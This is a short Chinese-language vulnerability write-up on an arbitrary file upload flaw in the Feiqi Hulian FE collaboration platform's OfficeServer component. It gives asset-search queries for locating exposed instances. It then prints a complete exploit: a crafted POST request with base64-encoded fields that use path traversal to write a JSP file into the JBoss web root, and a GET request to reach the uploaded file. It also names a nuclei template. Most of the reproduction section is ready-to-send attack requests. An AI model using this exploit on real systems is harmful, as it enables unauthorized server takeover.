飞企互联FE业务协作平台OfficeServer任意文件上传漏洞
一、漏洞简介
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联FE业务协作平台OfficeServer任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。。
二、影响版本
- 飞企互联FE业务协作平台
三、资产测绘
- hunter
app.name=="飞企互联 FE 6.0+"
||app.name=="飞企互联 FE"
- 登录页面
四、漏洞复现
POST /iweboffice/OfficeServer.js%70 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0.60dabdd3d70bcd96
Content-Length: 185
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Accept-Encoding: gzip, deflate
DBSTEP V3.0 93 0 28 DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
RECORDID=Li4vLi4vLi4vamJvc3Mvd2ViL2ZlLndhci91aWQuanNw
<%out.println("lOKB4C9g");%>
上传文件位置
GET /uid.jsp;.js HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0.60dabdd3d70bcd96
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Cookie: JSESSIONID=C02FFC1F802DE5889538E7D4DA810501
nuclei脚本
飞企互联fe-officeserver-任意文件上传.yaml